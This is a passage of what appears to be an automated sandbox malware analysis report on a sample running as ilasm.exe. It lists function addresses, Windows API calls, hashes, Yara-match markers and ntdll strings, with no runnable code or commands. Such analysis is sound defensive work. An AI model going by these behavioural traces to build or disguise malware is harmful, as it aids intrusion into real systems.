Opcode Fuzzy Hash: 68688b5fdd48e7518635b3ed01bbcd13e6a0ae63b5a384a8e579a1887b2e3bb0
Instruction Fuzzy Hash: ACA1E35BB0853285E31E73BD79699EC6700DFC533DB0846B7D22E8E0C79D48648B92E5

Function 00007FFD9B881158 Relevance: 1.6, Strings: 1, Instructions: 358COMMON

Download Yara Rule

Strings

1O_^, xrefs: 00007FFD9B881301

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID: 1O_^
API String ID: 0-2749740877
Opcode ID: 20b7ac03b17182f3a0f22640c2aa1d852e3ac790c87551a64a5b7689f70bfbac
Instruction ID: 85d9282f2a73009965d311f5636df9626fcad5c6c288fabcdc9cf116b67a0231
Opcode Fuzzy Hash: 20b7ac03b17182f3a0f22640c2aa1d852e3ac790c87551a64a5b7689f70bfbac
Instruction Fuzzy Hash: 1E91E157B0843386E31E73BD79699EC6700DF8533DB0846B7D16E8E0C79D48688B92E9

Analysis Process: ilasm.exePID: 7708, Parent PID: 7420COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	5.1%
Signature Coverage:	8%
Total number of Nodes:	138
Total number of Limit Nodes:	9

Executed Functions

Function 004175D3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417645

Memory Dump Source

Source File: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ilasm.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
Instruction ID: 197bba766baae9ccb9378d914d43791810f684092e84117df41e3d66ad4e84ee
Opcode Fuzzy Hash: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
Instruction Fuzzy Hash: 77015EB1E0020DABDB10DAA5DC42FDEB378AB14318F0041AAE90897240F634EB448B95

Function 0042B113 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?), ref: 0042B147

Memory Dump Source

Source File: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ilasm.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
Instruction ID: ecdc66760f4493d66e7f9721100b8e1ee1bc8025f612352e310ca33c1c5f3aed
Opcode Fuzzy Hash: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
Instruction Fuzzy Hash: C8E04F312002147BD210AA6ADC42FDB776CEFC5750F40401AFA0CA7282C67479118AF4

Function 05BF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05BF2DFA

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9f7b7f8afb33ffc2c6fc698993bc51f1a7359ce62719894530cb3ed08c5cbaa
Instruction ID: 507f75c7d7cd75fc1ae2f2751ab1ce116a745c9c781b13bcefb16bb4b85bc9c8
Opcode Fuzzy Hash: f9f7b7f8afb33ffc2c6fc698993bc51f1a7359ce62719894530cb3ed08c5cbaa
Instruction Fuzzy Hash: 3D90027220181453D11171584544707001987D0641FD5D812A042459CD96568A52A121

Function 05BF2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05BF2C7A

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea84347564b7b5dc1bb6a5f53cc27ec469ac499f5bc3bb0cdcc130bf6bab24f7
Instruction ID: 3b6f9cda30a4c5db7f00425a0eecc1fc6229e36595863c42d1122c602466382d
Opcode Fuzzy Hash: ea84347564b7b5dc1bb6a5f53cc27ec469ac499f5bc3bb0cdcc130bf6bab24f7
Instruction Fuzzy Hash: 6390027220189842D1107158844474A001587D0701F99D811A442469CD869589917121

Function 05BF2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05BF2B6A

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 614995f81f36a59828458d49e2b529ffa3c4e14b082b0617eb498af54b8e188c
Instruction ID: 93d4820f43fcdc4fe26ca9e9aae1e8de158ffa880955d219d0fc2183077d1172
Opcode Fuzzy Hash: 614995f81f36a59828458d49e2b529ffa3c4e14b082b0617eb498af54b8e188c
Instruction Fuzzy Hash: 999002A220281043410571584454616401A87E0601F95D421E10145D4DC52589916125

Function 05BF35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05BF35CA

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 357bea3c8115520dd9083a4eec71633e8173f3bc1f4d287f4d8da676e12537e5
Instruction ID: 2fa73efe1a77d420dcc00df54de5876b3e072f9ce3322565aac89bfd2473fde1
Opcode Fuzzy Hash: 357bea3c8115520dd9083a4eec71633e8173f3bc1f4d287f4d8da676e12537e5
Instruction Fuzzy Hash: 9590027260591442D10071584554706101587D0601FA5D811A04245ACD87958A5165A2

Function 00413BF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0

Strings

2E85-1J297, xrefs: 00413CA7, 00413CAA
2E85-1J297, xrefs: 00413C93, 00413C9F, 00413CB0

Memory Dump Source

Source File: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ilasm.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: 9ef06354370753566720ce0641794f4365d44dc161e8c80df766a471b4a826e7
Instruction ID: fac5187bc1ebd0f532d1b5a8304cfaa8bfc79ea26e974f1851d4e8212ffd96c9
Opcode Fuzzy Hash: 9ef06354370753566720ce0641794f4365d44dc161e8c80df766a471b4a826e7
Instruction Fuzzy Hash: F8110A71E4421875DB119BA1DC02FDF7B7C9B81750F044256BE14BB2C1E6B8570687E9

Function 00413C1D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0

Strings

2E85-1J297, xrefs: 00413CA7, 00413CAA
2E85-1J297, xrefs: 00413C93, 00413C9F, 00413CB0

Memory Dump Source

Source File: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ilasm.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: b17fdb8d00fd9dbf1a21d31b589a756d2dd2dcbfb6b92dee265ea2bf3424112c
Instruction ID: 7d834f13cbc57e5c5536fcf78db2658f70786329c2f6e1f07eabf56f68c91956
Opcode Fuzzy Hash: b17fdb8d00fd9dbf1a21d31b589a756d2dd2dcbfb6b92dee265ea2bf3424112c
Instruction Fuzzy Hash: AC11A571E4035876EB21AA91DC02FDF7B7C9F81754F04806AFE047B281E6B857068BE9

Function 00413C23 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0

Strings

2E85-1J297, xrefs: 00413CA7, 00413CAA
2E85-1J297, xrefs: 00413C93, 00413C9F, 00413CB0

Memory Dump Source

Source File: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ilasm.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: 40ac6464cc02b0a17f22d6a0f9b39d8a91636f7c6e9eedb624e9262c98edf3cc
Instruction ID: 1a282b7d84d996dac4ab3bb013e31c2a308f112e6a4d465b74d45ac7f165523c
Opcode Fuzzy Hash: 40ac6464cc02b0a17f22d6a0f9b39d8a91636f7c6e9eedb624e9262c98edf3cc
Instruction Fuzzy Hash: 51018871E4425876DB119B91DC02FDF7B7C9F41754F044066FE047B281E6B8570687E9

Function 0042B463 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,787DA667,00000007,00000000,00000004,00000000,00416EB6,000000F4,?,?,?,?,?), ref: 0042B4A2

Memory Dump Source

Source File: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ilasm.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
Instruction ID: 29216401f83c999bafc4889d1ef9cf5b8ded11cd2c7a16928c4b59d44ebfb468
Opcode Fuzzy Hash: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
Instruction Fuzzy Hash: BAE039712002047BD614EE59EC45FAB37ACEF89714F004419BA08A7282D670B9208BB5

Function 0042B413 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041DDDB,?,?,00000000,?,0041DDDB,?,?,?), ref: 0042B452

Memory Dump Source

Source File: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ilasm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
Instruction ID: 221cd86b377e2f50623e42edb0e4ae3167af5ca3d055178b3f991e940f0c7b33
Opcode Fuzzy Hash: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
Instruction Fuzzy Hash: 53E039B12042047BD610EA99EC41FAB37ACEB88710F00801AB908A7282CA70BD208BB4

Function 0042B4B3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,?,?,80D9C676,?,?,80D9C676), ref: 0042B4E7

Memory Dump Source

Source File: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ilasm.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2d6778b99e822911c47e8daccf314cfd6029762112306eba4285f25f923e9aa8
Instruction ID: 3649d5567d2ad1bba1c78f4e41195c4783f723823fa94b3f9b3b2a4a005bfd28
Opcode Fuzzy Hash: 2d6778b99e822911c47e8daccf314cfd6029762112306eba4285f25f923e9aa8
Instruction Fuzzy Hash: D2E04F356003147BD510AA5ADC45F9B775CDBC9714F40406AFA08A7281C6B079118BE4

Function 05BF2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05BF2C24

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49e1094b9d851b6e35752e6e6b5a93301d70b8b9037e5ca8f10cf0c8a9c833a6
Instruction ID: f12ade17f5be224e9b150c5b693abad8b9001e1f069ef24c13a9ff9c77f5397f
Opcode Fuzzy Hash: 49e1094b9d851b6e35752e6e6b5a93301d70b8b9037e5ca8f10cf0c8a9c833a6
Instruction Fuzzy Hash: A1B09B729019D5C5DB11E7604A08B177911F7D0705F55C461D3030685E4738D1D5E275

Non-executed Functions

Function 05C68D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE

Download Yara Rule

Strings

write to, xrefs: 05C68F56
The critical section is owned by thread %p., xrefs: 05C68E69
*** Resource timeout (%p) in %ws:%s, xrefs: 05C68E02
a NULL pointer, xrefs: 05C68F90
*** then kb to get the faulting stack, xrefs: 05C68FCC
*** A stack buffer overrun occurred in %ws:%s, xrefs: 05C68DA3
*** Inpage error in %ws:%s, xrefs: 05C68EC8
The resource is owned exclusively by thread %p, xrefs: 05C68E24
*** enter .exr %p for the exception record, xrefs: 05C68FA1
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05C68E86
read from, xrefs: 05C68F5D, 05C68F62
The resource is owned shared by %d threads, xrefs: 05C68E2E
Go determine why that thread has not released the critical section., xrefs: 05C68E75
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05C68E3F
<unknown>, xrefs: 05C68D2E, 05C68D81, 05C68E00, 05C68E49, 05C68EC7, 05C68F3E
The instruction at %p referenced memory at %p., xrefs: 05C68EE2
an invalid address, %p, xrefs: 05C68F7F
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 05C68DD3
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 05C68F34
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 05C68F26
This failed because of error %Ix., xrefs: 05C68EF6
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 05C68E4B
The instruction at %p tried to %s , xrefs: 05C68F66
*** An Access Violation occurred in %ws:%s, xrefs: 05C68F3F
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 05C68FEF
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 05C68DB5
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 05C68D8C
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 05C68DC4
*** enter .cxr %p for the context, xrefs: 05C68FBD
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 05C68F2D

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 267d5944fe99548a347a8b3b3af6bbd8fc07c7ccd7e8c0a221707ebbefcee024
Instruction ID: a7a5cc380c22c1013ef1dbc04396208d722aab42e873d1205298c9216ad9641f
Opcode Fuzzy Hash: 267d5944fe99548a347a8b3b3af6bbd8fc07c7ccd7e8c0a221707ebbefcee024
Instruction Fuzzy Hash: 0581EC7AA48214FFDB159B14CC8AD7B3BB6EF46710F050C88F1059F172E376A611EA62

Function 05C32349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

@, xrefs: 05C32942
UseImpersonatedDeviceMap, xrefs: 05C3251C
RaiseExceptionOnPossibleDeadlock, xrefs: 05C32579
ExecuteOptions, xrefs: 05C325A0
@, xrefs: 05C32B74
ShutdownFlags, xrefs: 05C324A1
Initializing the application verifier package failed with status 0x%08lx, xrefs: 05C33176
LdrpInitializeExecutionOptions, xrefs: 05C3317D
MaxDeadActivationContexts, xrefs: 05C32D82
GlobalFlag, xrefs: 05C32F3F, 05C33059
minkernel\ntdll\ldrinit.c, xrefs: 05C33187
UnloadEventTraceDepth, xrefs: 05C324C0
FrontEndHeapDebugOptions, xrefs: 05C32489
MaxLoaderThreads, xrefs: 05C324EC
TracingFlags, xrefs: 05C32549
GlobalFlag2, xrefs: 05C32FC0
CFGOptions, xrefs: 05C32967
DisableExceptionChainValidation, xrefs: 05C3275F
MinimumStackCommitInBytes, xrefs: 05C32BB0
DisableHeapLookaside, xrefs: 05C3246D

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: f546779cef57287f6f79a566e5dc255a425cf302e01b96b8b5a7cd86a0982fb2
Instruction ID: e9a918d746707e46cd53c3d935713431f57040992196f7f0d28cfaa09619583f
Opcode Fuzzy Hash: f546779cef57287f6f79a566e5dc255a425cf302e01b96b8b5a7cd86a0982fb2
Instruction Fuzzy Hash: 05928A79608349ABEB21CF24C886F6BB7E9BB84714F044C2DFA95D7250D770E944CB92

Function 05BE8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Address of the debug info found in the active list., xrefs: 05C254AE, 05C254FA
Critical section address, xrefs: 05C25425, 05C254BC, 05C25534
undeleted critical section in freed memory, xrefs: 05C2542B
8, xrefs: 05C252E3
Thread identifier, xrefs: 05C2553A
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05C254E2
Critical section address., xrefs: 05C25502
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05C2540A, 05C25496, 05C25519
Critical section debug info address, xrefs: 05C2541F, 05C2552E
Thread is in a state in which it cannot own a critical section, xrefs: 05C25543
double initialized or corrupted critical section, xrefs: 05C25508
Invalid debug info address of this critical section, xrefs: 05C254B6
corrupted critical section, xrefs: 05C254C2
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05C254CE

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: d52d5e2c10c8b7d2164b8d6f8c1bf7812d4d9509857fcd28e13750bb6da3f300
Instruction ID: cf5fe7e396b9114117fbcb1eea3296cb85b340838772b6427faec2075db94c5d
Opcode Fuzzy Hash: d52d5e2c10c8b7d2164b8d6f8c1bf7812d4d9509857fcd28e13750bb6da3f300
Instruction Fuzzy Hash: BA818AB1A04358AFDF24CF95C845BAEBBB6FB09704F1445A9F504BB290D7B1B940DBA0

Function 05BE29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 05C22624
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 05C22498
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 05C224C0
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 05C22412
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 05C22506
@, xrefs: 05C2259B
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 05C22409
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 05C22602
RtlpResolveAssemblyStorageMapEntry, xrefs: 05C2261F
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 05C222E4
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 05C225EB

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 8d9edb730d8e8e6f63d135758b16b0d20f8858ca32da96007d3cd9f7618a1b5e
Instruction ID: 6e4e42d1c5549dfac4bb1ac4995f6963d68394df0ea0bdd1bfd445dba7307063
Opcode Fuzzy Hash: 8d9edb730d8e8e6f63d135758b16b0d20f8858ca32da96007d3cd9f7618a1b5e
Instruction Fuzzy Hash: 29028EF5D042289BDB31DB14CC85BAAF7B9AB44304F4445EAE609B7241EB70AF84CF59

Function 05BCAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

LdrGetDllHandleEx, xrefs: 05C1807C, 05C183B2
LdrpInitializeDllPath, xrefs: 05C180AD
minkernel\ntdll\ldrfind.c, xrefs: 05C182E1
minkernel\ntdll\ldrutil.c, xrefs: 05C180B7
DLL search path passed in externally: %ws, xrefs: 05C180A6
DLL name: %wZ, xrefs: 05C18075
LdrpFindLoadedDllInternal, xrefs: 05C182D7
minkernel\ntdll\ldrapi.c, xrefs: 05C18086, 05C183BC
Status: 0x%08lx, xrefs: 05C182D0, 05C183AB

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 914d788926196a91c5c41ef8bfa9bbe6b9773b9059219ee36ef85a975e6efc50
Instruction ID: 809e8fab85ec2e72369942ce675e894164e087c13656d3b0fd7b9cd5166ad7e2
Opcode Fuzzy Hash: 914d788926196a91c5c41ef8bfa9bbe6b9773b9059219ee36ef85a975e6efc50
Instruction Fuzzy Hash: A412F171A083458BD724DF28C485BBABBE5FF85704F4409DDF9859B290EB30E944CB9A

Function 05C60CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON

Download Yara Rule

Strings

Non-Dedicated free list element %p is out of order, xrefs: 05C60E6D
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 05C6113D
HEAP[%wZ]: , xrefs: 05C60E54, 05C60EB5, 05C60FC8, 05C61051, 05C61117, 05C6116B
dedicated (%04Ix) free list element %p is marked busy, xrefs: 05C60ED1
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 05C60FE4
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 05C61192
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 05C6106F
HEAP: , xrefs: 05C60E61, 05C60EC2, 05C60FD5, 05C6105E, 05C61124, 05C61178

Memory Dump Source

Source File: 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5b80000_ilasm.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: 91b4d9c1a699e48762dea9620e91dd6b3f42d4e455221f132d97a933eb54c77a
Instruction ID: f62f52f5f9221776b6073eb00700c668572e0dbf4590e1fac8c6ce3bbd17957c
Opcode Fuzzy Hash: 91b4d9c1a699e48762dea9620e91dd6b3f42d4e455221f132d97a933eb54c77a
Instruction Fuzzy Hash: CCF1E535A08656EFCB25DF68C488BBAB7F5FF05704F084899E482A7251C734BB85CB51

Function 05C60274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 05C603BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 05C6069F
RtlReAllocateHeap, xrefs: 05C602BF, 05C60362
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 05C604D3
HEAP[%wZ]: , xrefs: 05C60399, 05C604A8, 05C605D0, 05C60675, 05C606CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 05C606EA
Just reallocated block at %p to %Ix bytes, xrefs: 05C605F1
HEAP: , xrefs: 05C603A6, 05C604B5, 05C605DD, 05C60682, 05C606D9

Memory Dump Source

